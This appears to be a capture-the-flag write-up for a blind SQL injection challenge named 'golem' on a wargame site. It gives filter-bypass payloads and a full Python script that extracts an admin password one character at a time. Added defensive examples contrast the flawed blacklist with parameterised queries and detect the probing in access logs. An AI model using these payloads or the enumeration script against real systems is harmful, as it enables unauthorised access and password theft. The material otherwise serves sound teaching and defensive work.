Source code analysis
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
The filters block the use of ( ), or, and, and substr.
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
This is a blind SQL injection problem: the goal is to recover admin's pw.
Bypass mapping used below: ( -> %28, ) -> %29, or -> ||, and -> &&, substr -> substring
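The following is an added example, not the challenge's own code. It transcribes the two preg_match blacklists above into Python regexes to show that the write-up's payload slips through both, and then puts the interpolated query next to a parameterised version run against an in-memory SQLite stand-in for prob_golem (the table contents and the admin password value are constructed for the example). With the pw value bound as a parameter, the same payload is compared as an opaque string and returns no row, which is the fix the filter approach fails to provide.

```python
import re
import sqlite3

# The two blacklists from the challenge source, transcribed as Python regexes.
# PHP's preg_match with /i is a case-insensitive substring search, which re.search reproduces.
FILTER_1 = re.compile(r"prob|_|\.|\(\)", re.IGNORECASE)     # exit("No Hack ~_~")
FILTER_2 = re.compile(r"or|and|substr\(|=", re.IGNORECASE)  # exit("HeHe")


def passes_blacklist(pw: str) -> bool:
    """True when the (already URL-decoded) pw value gets past both filters.

    Note that FILTER_1 only rejects the literal pair '()', not single parentheses,
    and FILTER_2 rejects 'substr(' but not 'substring('."""
    return not FILTER_1.search(pw) and not FILTER_2.search(pw)


def vulnerable_query(pw: str) -> str:
    """The query the challenge builds by string interpolation.

    Returned for inspection rather than executed here: SQLite reads || as string
    concatenation, whereas MySQL evaluates || and && as OR and AND."""
    return f"select pw from prob_golem where id='admin' and pw='{pw}'"


ADMIN_PW = "constructed-pw-8"  # constructed sample value, not the challenge's real password


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the prob_golem table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table prob_golem (id text, pw text)")
    conn.executemany("insert into prob_golem values (?, ?)",
                     [("admin", ADMIN_PW), ("guest", "guest")])
    return conn


def lookup_admin_pw(conn: sqlite3.Connection, pw: str):
    """Hardened form: pw is bound as a parameter, so any operators inside it are inert.

    Returns the stored pw only on an exact match, otherwise None."""
    row = conn.execute(
        "select pw from prob_golem where id='admin' and pw=?", (pw,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' || length(pw) like 8 && id like 'admin"
    print("blacklist passes payload:", passes_blacklist(payload))
    print("query the challenge would run:", vulnerable_query(payload))
    conn = make_db()
    print("parameterised lookup with payload:", lookup_admin_pw(conn, payload))
    print("parameterised lookup with real pw:", lookup_admin_pw(conn, ADMIN_PW))
```

The blacklist is a denylist of spellings, so every synonym the database accepts (substring for substr, || for or, && for and, like for =) has to be enumerated, and the filter still misses this one. Parameter binding removes the question entirely because the value never becomes part of the SQL text.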
?pw=' || length%28pw%29like 8 %26%26 id like 'admin
pw=' || length%28pw%29like 8 %26%26 id like 'admin
?pw=%27%20||%20substring%28pw,1,1%29%20like%208%20%26%26%20id%20like%20%27admin
pw=%27 || substring%28pw,1,1%29 like 8 %26%26 id like 'admin
import http.client
from urllib.parse import quote

result = ''
leng = 0
header = {'Cookie': ' '}  # session cookie goes here; left blank in the original
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Step 1: find the password length with length(pw) like N
for i in range(1, 100):
    length = ('/golem_39f3348098ccda1e71a4650f40caa037.php?pw=%27%20||%20length%28pw%29%20like%20'
              + str(i) + '%20%26%26%20id%20like%20%27admin')
    conn = http.client.HTTPConnection('los.eagle-jump.org')
    conn.request('GET', length, '', header)
    data = conn.getresponse().read()
    if "Hello admin" in data.decode(errors='replace'):
        leng = i
        print("pw length: " + str(i))
        break

# Step 2: recover one character at a time with substring(pw,i,1) like 'c'
for i in range(1, leng + 1):
    for c in string:
        # quote() URL-encodes characters such as %, &, # and + so they survive the query string
        substr = ('/golem_39f3348098ccda1e71a4650f40caa037.php?pw=%27%20||%20substring%28pw,'
                  + str(i) + ',1%29%20like%20%27' + quote(c, safe='')
                  + '%27%26%26%20id%20like%20%27admin')
        conn = http.client.HTTPConnection('los.eagle-jump.org')
        conn.request('GET', substr, '', header)
        data = conn.getresponse().read()
        if 'Hello admin' in data.decode(errors='replace'):
            result = result + c
            print('substring(pw,' + str(i) + ',1)= ' + c)
            break

print('Password is ' + result)
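From the defender's side, the probing above leaves a very recognisable trail: one client sends dozens of requests whose pw parameter, once URL-decoded, contains a boolean operator, a LIKE comparison and a length or substring function, differing only in the position or candidate value. The following added example (not part of the original write-up) parses constructed access-log lines in common log format, decodes the pw parameter, scores it against those indicators and raises an alert per client IP once enough flagged requests accumulate. The client IPs, timestamps and log lines are constructed; the request shape mirrors the probes shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Indicators evaluated on the decoded, lower-cased pw value. Word boundaries keep
# ordinary values such as "android" or "password" from matching "and" / "or".
INDICATORS = [
    (re.compile(r"\|\||&&|\bor\b|\band\b"), "boolean operator"),
    (re.compile(r"\blike\b|[<>]"), "comparison"),
    (re.compile(r"\b(?:length|substring|substr|mid|ascii|ord)\s*\("), "string/length function"),
    (re.compile(r"'"), "quote"),
]


def probe_line(sec: int, n: int) -> str:
    """Constructed log line for one length(pw) like N probe from a constructed attacker IP."""
    return (f'203.0.113.7 - - [28/May/2017:10:00:{sec:02d} +0900] '
            f'"GET /golem_39f3348098ccda1e71a4650f40caa037.php'
            f'?pw=%27%20||%20length%28pw%29%20like%20{n}%20%26%26%20id%20like%20%27admin HTTP/1.1" 200 512')


# Constructed sample: six probes from one client, two benign logins from another.
SAMPLE_LOG = [probe_line(i, i) for i in range(1, 7)] + [
    '198.51.100.2 - - [28/May/2017:10:01:00 +0900] '
    '"GET /golem_39f3348098ccda1e71a4650f40caa037.php?pw=hello123 HTTP/1.1" 200 512',
    '198.51.100.2 - - [28/May/2017:10:01:05 +0900] '
    '"GET /golem_39f3348098ccda1e71a4650f40caa037.php?pw=O%27Brien HTTP/1.1" 200 512',
]


def pw_param(target: str) -> str:
    """Extract and URL-decode the pw query parameter (empty string if absent)."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return qs.get("pw", [""])[0]


def score_payload(pw: str) -> list:
    """Names of the indicators present in a decoded pw value."""
    text = re.sub(r"\s+", " ", pw).lower()
    return [name for pattern, name in INDICATORS if pattern.search(text)]


def analyse(lines, min_score: int = 2) -> dict:
    """Per-client summary: request count, flagged count and a few sample payloads.

    A request is flagged when at least min_score indicators match, so a lone
    apostrophe (O'Brien) is not enough on its own."""
    per_ip = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        pw = pw_param(m["target"])
        hits = score_payload(pw)
        entry = per_ip.setdefault(m["ip"], {"requests": 0, "flagged": 0, "samples": []})
        entry["requests"] += 1
        if len(hits) >= min_score:
            entry["flagged"] += 1
            if len(entry["samples"]) < 3:
                entry["samples"].append((pw, hits))
    return per_ip


def alerts(per_ip: dict, threshold: int = 5) -> list:
    """Client IPs whose flagged request count reaches the threshold."""
    return sorted(ip for ip, entry in per_ip.items() if entry["flagged"] >= threshold)


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for ip, entry in report.items():
        print(ip, entry["requests"], "requests,", entry["flagged"], "flagged")
        for pw, hits in entry["samples"]:
            print("   ", repr(pw), "->", hits)
    print("alert:", alerts(report))
```

Decoding before matching is the essential step: the PHP filter in the challenge inspects the decoded value too, but a log-based rule that matched on the raw, encoded request line would miss `%28`, `%27` and `%26%26` entirely. Thresholding per client rather than alerting on a single request keeps a one-off stray quote out of the queue while the enumeration pattern, which needs one request per length guess and per character candidate, crosses it quickly.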